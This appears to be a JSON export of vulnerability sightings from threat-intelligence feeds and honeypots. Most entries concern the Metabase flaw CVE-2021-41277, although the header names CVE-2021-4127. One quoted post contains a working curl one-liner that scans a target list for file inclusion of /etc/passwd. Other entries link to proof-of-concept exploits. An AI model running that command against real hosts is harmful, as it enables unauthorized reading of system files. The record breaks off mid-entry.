{"vulnerability": "CVE-2021-4127", "sightings": [{"uuid": "f48cdd6d-9957-43a3-baa3-e00d2e085460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2659502", "content": "", "creation_timestamp": "2024-11-12T19:24:15.536378Z"}, {"uuid": "648460d0-e21c-49b3-a13c-1ff9686919c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113471442114730989", "content": "", "creation_timestamp": "2024-11-12T18:40:00.715502Z"}, {"uuid": "113e484e-5113-420a-8da1-2fa890f1bc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-11-12T21:10:02.000000Z"}, {"uuid": "ed8f4d4d-613e-4616-a8f0-5721b503337d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-30)", "content": "", "creation_timestamp": "2025-01-30T00:00:00.000000Z"}, {"uuid": "27055d37-8726-4dab-a509-13d8a50eb38e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "5acf8f3b-eefc-4838-a27c-db226e6789fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 
"author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-31)", "content": "", "creation_timestamp": "2025-01-31T00:00:00.000000Z"}, {"uuid": "bdb7eb78-3a4f-4291-a7bc-da19fd87b2a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "f5c8b394-e7b7-42d2-9cd1-ca5fb7db1704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "c29af405-16c7-4a3f-beb2-9b63fa2e9f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "af96c2ca-99b6-4270-8376-4ad9b522684f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "c26b5eac-3983-4509-8491-1d72cceb94d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The 
Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "9c795976-8fbf-41bb-98c3-a2cfbaad632b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "7685a89f-a732-4624-9ce3-1b3c141a7785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "9f3edd21-b560-48cb-b534-54e014b09fb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "542427aa-5329-412c-811c-aa17a0606fec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "f22aecdd-9d3f-40f9-86fe-ed214b453f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-05)", "content": "", "creation_timestamp": "2025-03-05T00:00:00.000000Z"}, 
{"uuid": "dabcc3bc-30ae-4933-a44a-aca492d9dea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "e67a73b2-7339-447a-a8e8-9071948b23a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "32e0a312-9a4f-4a18-bc78-5fc02e9e52b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "50a0c7df-7bc1-4907-a6dc-5ce7a4c2f272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "41f59f5e-edb0-4635-8af6-c4293d46690b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "87e3ac30-b4cf-4334-a38f-63219838d927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:11:01.000000Z"}, {"uuid": "483b560b-f161-4cbf-ac31-6408d530f876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-17)", "content": "", "creation_timestamp": "2025-06-17T00:00:00.000000Z"}, {"uuid": "3bc71f1d-3d0b-4174-a0f4-f79ee2ec6edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "c79e9ee1-45ff-433a-9f46-3bacc0b56e91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-01)", "content": "", "creation_timestamp": "2025-07-01T00:00:00.000000Z"}, {"uuid": "898fefb4-432c-42c7-ad6f-914f00317ef4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "88c8c42f-5203-4025-a22f-729fd12fa68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - 
(2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "18272979-ca47-495c-aaeb-e3d94270c7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "472e8049-8e48-41ac-b1c7-4839e47d4a47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lordwbykcs25", "content": "", "creation_timestamp": "2025-05-09T21:15:54.053232Z"}, {"uuid": "89d4376a-2bfd-423b-b2e6-8821f5a07074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lordwdagok25", "content": "", "creation_timestamp": "2025-05-09T21:15:54.699739Z"}, {"uuid": "56f65479-6936-4d02-846b-68597fde863f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "83708d17-1081-4ef2-a48a-29a8ba474f43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-25)", "content": "", "creation_timestamp": "2025-07-25T00:00:00.000000Z"}, {"uuid": "7394f466-4000-4860-b954-0335fece64c8", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-20)", "content": "", "creation_timestamp": "2025-07-20T00:00:00.000000Z"}, {"uuid": "b146a48f-09e4-46e0-9ae8-b50dd5eafcb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "4f1a1e95-4955-4d6e-bfdf-2c6f8c31a5f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41278", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lyo5wachhi2g", "content": "", "creation_timestamp": "2025-09-12T21:02:25.170006Z"}, {"uuid": "b2dfab2d-6fe6-4d59-b1bf-226687df846d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-06)", "content": "", "creation_timestamp": "2026-01-06T00:00:00.000000Z"}, {"uuid": "a6f5743f-bb5e-4b5d-91a8-440f6824f008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-27)", "content": "", "creation_timestamp": "2026-03-27T00:00:00.000000Z"}, {"uuid": "39742f19-2af3-4369-8e14-57dd7bf3051c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "cdf4cee6-3932-470e-b73e-087843354304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-11)", "content": "", "creation_timestamp": "2026-01-11T00:00:00.000000Z"}, {"uuid": "ce76bae9-c044-4ef8-a43f-0574c6f1254d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-12)", "content": "", "creation_timestamp": "2026-01-12T00:00:00.000000Z"}, {"uuid": "7c266bcb-366c-46c1-9f7b-3a3c24a2f954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-26)", "content": "", "creation_timestamp": "2026-03-26T00:00:00.000000Z"}, {"uuid": "1c8cb074-27c5-4c68-96a8-78bac98f6fd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "35b9ed79-a537-48a7-b06b-43a045d6469a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-20)", "content": "", 
"creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "f1b15841-bf25-4bf2-8c6c-114470dc28ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "0c1211ed-f0bf-4e43-b034-bc487fe823ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/318678a8-3f9f-4940-843d-ef7f2ce5abc2", "content": "", "creation_timestamp": "2026-02-02T12:26:22.530201Z"}, {"uuid": "ff0f2e8f-2a52-4b16-97a7-31292d68006e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "607c42e8-0d06-431a-b7f6-40548889e563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "36f66f5c-ff4b-4323-9a5c-2464eabf27e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8206", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day | CVE-2021-41277\n\ncat targets.txt | while read host do;do curl --silent --insecure 
--path-as-is \"$host/api/geojson?url=file:///etc/passwd\" | grep -qs \"root:x\" &amp;&amp; echo \"$host \\033[0;31m Vulnerable\";done\n\nhttps://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr", "creation_timestamp": "2021-11-24T19:33:37.000000Z"}, {"uuid": "0a16a1d9-7a08-4423-b657-90e60e94ebbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "fec8d615-02ec-4f54-9d9f-bcda3f36508b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "033e09eb-ed5f-43b3-a054-cb9e563e959e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1296", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41277 can be extended to an SSRF \nURL\uff1ahttps://github.com/sasukeourad/CVE-2021-41277_SSRF", "creation_timestamp": "2022-01-10T01:54:46.000000Z"}, {"uuid": "49bb9f28-fb82-4f4e-94a0-5471adcd7c9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": 
"20ba10c4-afb3-4b14-a8ec-08889157d4ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "960e34d3-10a9-4c5a-9744-413295875e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-12)", "content": "", "creation_timestamp": "2026-04-12T00:00:00.000000Z"}, {"uuid": "2d79375b-85ff-480d-9d5c-3af474f255f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIt is a nmap script for metabase vulnerability (CVE-2021-41277)\nURL\uff1ahttps://github.com/frknktlca/Metabase_Nmap_Script", "creation_timestamp": "2022-01-19T17:45:18.000000Z"}, {"uuid": "4a736028-3a94-43b4-841c-776bdc6e4fb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-16)", "content": "", "creation_timestamp": "2026-04-16T00:00:00.000000Z"}, {"uuid": "f970a88b-6ab6-4800-9e2a-822ac02df4db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": 
"https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/metabase_cve_2021_41277", "content": "", "creation_timestamp": "2021-12-01T07:22:50.000000Z"}, {"uuid": "9380e19c-f5d0-4cd1-a611-28c90e7389b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-24)", "content": "", "creation_timestamp": "2026-04-24T00:00:00.000000Z"}, {"uuid": "1eb2528e-4892-4153-9763-94d503105677", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-20)", "content": "", "creation_timestamp": "2026-04-20T00:00:00.000000Z"}, {"uuid": "dd7bc66b-aa06-48c0-881f-561857df4b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/883", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for CVE-2021-41277\nURL\uff1ahttps://github.com/tahtaciburak/CVE-2021-41277", "creation_timestamp": "2021-11-25T21:13:59.000000Z"}, {"uuid": "601f367d-8b62-4758-95f7-f9053ebbeafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "Telegram/5u7FwDgfpeKuzG8ivHxniYFe1bK287W_1ULABUcApgjoyw", "content": "", "creation_timestamp": "2021-11-25T23:07:49.000000Z"}, {"uuid": "4cffa76b-02c3-4a23-a726-1c91427ec3dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/arpsyndicate/1564", "content": "#ExploitObserverAlert\n\nCVE-2021-41277\n\nDESCRIPTION: Exploit Observer has 50 entries related to CVE-2021-41277. Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin-&gt;settings-&gt;maps-&gt;custom maps-&gt;add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you\u2019re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n\nFIRST-EPSS: 0.067680000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-08T13:01:21.000000Z"}, {"uuid": "c82171de-abb4-4a29-8e38-4997a00c2f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/612", "content": "CVE-2021-41277 can be extended to an SSRF\nhttps://github.com/sasukeourad/CVE-2021-41277_SSRF\n\nSonicWall SMA-100 Unauth RCE \nExploit CVE-2021-20038\nhttps://github.com/jbaines-r7/badblood", "creation_timestamp": "2022-01-11T18:24:46.000000Z"}, {"uuid": "c68fdcae-5b4d-4c8c-b344-0c0455b06e30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "Telegram/5gxatJpYVM_NPaPWX745N9ibdK_MxDhjygYPpnblnfkz7g", "content": "", "creation_timestamp": "2021-11-23T22:40:00.000000Z"}, {"uuid": "c67a059f-3601-4572-8210-cec2453b8db8", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4127", "type": "seen", "source": "https://t.me/cibsecurity/55151", "content": "\u203c CVE-2021-4127 \u203c\n\nAn out of date graphics library (Angle) likely contained vulnerabilities that could potentially be exploited. This vulnerability affects Thunderbird &lt; 78.9 and Firefox ESR &lt; 78.9.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-12-22T22:23:46.000000Z"}, {"uuid": "5307e376-8c15-407c-a762-9db6c6bd6f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41270", "type": "seen", "source": "https://t.me/cibsecurity/32975", "content": "\u203c CVE-2021-41270 \u203c\n\nSymfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula injection. In Symfony 4.1, maintainers added the opt-in `csv_escape_formulas` option in the `CsvEncoder`, to prefix all cells starting with `=`, `+`, `-` or `@` with a tab `\\t`. Since then, OWASP added 2 chars in that list: Tab (0x09) and Carriage return (0x0D). This makes the previous prefix char (Tab `\\t`) part of the vulnerable characters, and OWASP suggests using the single quote `'` for prefixing the value. 
